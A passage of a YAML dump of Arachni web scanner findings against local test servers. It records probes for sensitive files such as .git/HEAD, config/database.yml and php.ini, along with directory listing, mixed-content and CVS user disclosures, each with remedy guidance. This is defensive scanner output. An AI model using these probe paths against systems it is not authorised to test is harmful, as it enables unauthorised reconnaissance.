        Server: WEBrick/1.3.1 (Ruby/1.9.3/2012-04-20) OpenSSL/1.0.1c
        Date: Fri, 05 Oct 2012 18:14:42 GMT
        Connection: Keep-Alive
    id: 
    injected: 
    internal_modname: MixedResource
    method: GET
    mod_name: Mixed Resource
    name: Mixed Resource
    opts: 
      :regexp: http://localhost/theme.css
      :match: http://localhost/theme.css
      :element: body
    references: 
      Google Online Security Blog: http://googleonlinesecurity.blogspot.com/2011/06/trying-to-end-mixed-scripting.html
    regexp: http://localhost/theme.css
    regexp_match: http://localhost/theme.css
    remedy_guidance: Configure the server to serve all resources over the encrypted channel.
    response: "            <link rel=\"stylesheet\" type=\"text/css\" href=\"http://localhost/theme.css\" />\n"
    severity: Medium
    tags: 
    - unencrypted
    - resource
    - javascript
    - stylesheet
    url: https://localhost:7760/vuln_link
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/robots.txt
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "10"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: robots.txt
    injected: robots.txt
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: robots.txt
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/robots.txt
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/sitemap.xml
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "11"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: sitemap.xml
    injected: sitemap.xml
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: sitemap.xml
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/sitemap.xml
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/sitemap.xml.gz
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "14"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: sitemap.xml.gz
    injected: sitemap.xml.gz
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: sitemap.xml.gz
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/sitemap.xml.gz
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/phpinfo.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "11"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: phpinfo.php
    injected: phpinfo.php
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: phpinfo.php
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/phpinfo.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/CVS/Repository
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "14"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Repository
    injected: Repository
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: CVS/Repository
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/CVS/Repository
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/CVS/Root
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Root
    injected: Root
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: CVS/Root
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/CVS/Root
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/CVS/Entries
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "11"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Entries
    injected: Entries
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: CVS/Entries
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/CVS/Entries
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/.git/HEAD
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: HEAD
    injected: HEAD
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: .git/HEAD
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/.git/HEAD
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/_mmServerScripts/MMHTTPDB.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "29"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: MMHTTPDB.php
    injected: MMHTTPDB.php
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: _mmServerScripts/MMHTTPDB.php
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/_mmServerScripts/MMHTTPDB.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/_mmServerScripts/MMHTTPDB.asp
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "29"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: MMHTTPDB.asp
    injected: MMHTTPDB.asp
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: _mmServerScripts/MMHTTPDB.asp
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/_mmServerScripts/MMHTTPDB.asp
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/_mmDBScripts/MMHTTPDB.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "25"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: MMHTTPDB.php
    injected: MMHTTPDB.php
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: _mmDBScripts/MMHTTPDB.php
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/_mmDBScripts/MMHTTPDB.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/_mmDBScripts/MMHTTPDB.asp
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "25"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: MMHTTPDB.asp
    injected: MMHTTPDB.asp
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: _mmDBScripts/MMHTTPDB.asp
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/_mmDBScripts/MMHTTPDB.asp
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/config/database.yml
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "19"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: database.yml
    injected: database.yml
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: config/database.yml
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/config/database.yml
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/install.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "11"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: install.php
    injected: install.php
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: install.php
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/install.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/wp-admin/install.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "20"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: install.php
    injected: install.php
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: wp-admin/install.php
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/wp-admin/install.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/wp-admin/setup-config.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "25"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: setup-config.php
    injected: setup-config.php
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: wp-admin/setup-config.php
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/wp-admin/setup-config.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/config.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "10"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: config.php
    injected: config.php
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: config.php
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/config.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/php.ini
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: php.ini
    injected: php.ini
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: php.ini
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/php.ini
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Tries to find common sensitive files on the server.
  elem: path
  internal_modname: CommonFiles
  method: ""
  mod_name: CommonFiles
  name: A common sensitive file exists on the server.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Low
  tags: 
  - common
  - path
  - file
  - discovery
  url: http://localhost:9995/error_log
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Tries to find common sensitive files on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: error_log
    injected: error_log
    internal_modname: CommonFiles
    method: ""
    mod_name: CommonFiles
    name: A common sensitive file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
    remedy_guidance: Do not expose file and directory information to the user.
    response: error_log
    severity: Low
    tags: 
    - common
    - path
    - file
    - discovery
    url: http://localhost:9995/error_log
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "548"
  cwe_url: http://cwe.mitre.org/data/definitions/548.html
  description: |-
    In most circumstances enabling directory listings is a bad practise
        as it allows an attacker to better grasp the web application's structure.
  elem: server
  internal_modname: DirectoryListing
  method: GET
  mod_name: Directory listing
  name: Directory listing is enabled.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/548.html
  remedy_guidance: |-
    Restrict access to important directories or files by adopting a need to know requirement for both the document and server root,
                        and turn off features such as Automatic Directory Listings.
  severity: Low
  tags: 
  - path
  - directory
  - listing
  - index
  url: http://localhost:7472/some/
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "548"
    cwe_url: http://cwe.mitre.org/data/definitions/548.html
    description: |-
      In most circumstances enabling directory listings is a bad practise
          as it allows an attacker to better grasp the web application's structure.
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "935"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: DirectoryListing
    method: GET
    mod_name: Directory listing
    name: Directory listing is enabled.
    opts: 
      :element: server
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/548.html
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Restrict access to important directories or files by adopting a need to know requirement for both the document and server root,
                          and turn off features such as Automatic Directory Listings.
    response: /home/zapotek/workspace/arachni/spec/servers/modules/recon/xst.rb<br/>/home/zapotek/workspace/arachni/spec/servers/modules/recon/htaccess_limit.rb<br/>/home/zapotek/workspace/arachni/spec/servers/modules/recon/http_put.rb<br/>/home/zapotek/workspace/arachni/spec/servers/modules/recon/webdav.rb<br/>/home/zapotek/workspace/arachni/spec/servers/modules/recon/allowed_methods.rb<br/>/home/zapotek/workspace/arachni/spec/servers/modules/recon/common_directories.rb<br/>/home/zapotek/workspace/arachni/spec/servers/modules/recon/interesting_responses.rb<br/>/home/zapotek/workspace/arachni/spec/servers/modules/recon/backdoors.rb<br/>/home/zapotek/workspace/arachni/spec/servers/modules/recon/backup_files.rb<br/>/home/zapotek/workspace/arachni/spec/servers/modules/recon/directory_listing.rb<br/>/home/zapotek/workspace/arachni/spec/servers/modules/recon/common_files.rb<br/>/home/zapotek/workspace/arachni/spec/servers/modules/recon/grep
    severity: Low
    tags: 
    - path
    - directory
    - listing
    - index
    url: http://localhost:7472/some/
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: A CVS or SVN user is disclosed in the body of the HTML page.
  elem: body
  internal_modname: CvsSvnUsers
  method: GET
  mod_name: CVS/SVN users
  name: CVS/SVN user disclosure.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/200.html
  remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
  severity: Low
  tags: []

  url: http://localhost:14511/locker
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: A CVS or SVN user is disclosed in the body of the HTML page.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "24"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CvsSvnUsers
    method: GET
    mod_name: CVS/SVN users
    name: CVS/SVN user disclosure.
    opts: 
      :regexp: "(?-mix:\\$Locker: (\\w+) \\$)"
      :match: markd_locker
      :element: body
    references: 
      CWE: http://cwe.mitre.org/data/definitions/200.html
    regexp: "(?-mix:\\$Locker: (\\w+) \\$)"
    regexp_match: markd_locker
    remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
    response: "$Locker: markd_locker $ "
    severity: Low
    tags: []

    url: http://localhost:14511/locker
    var: 
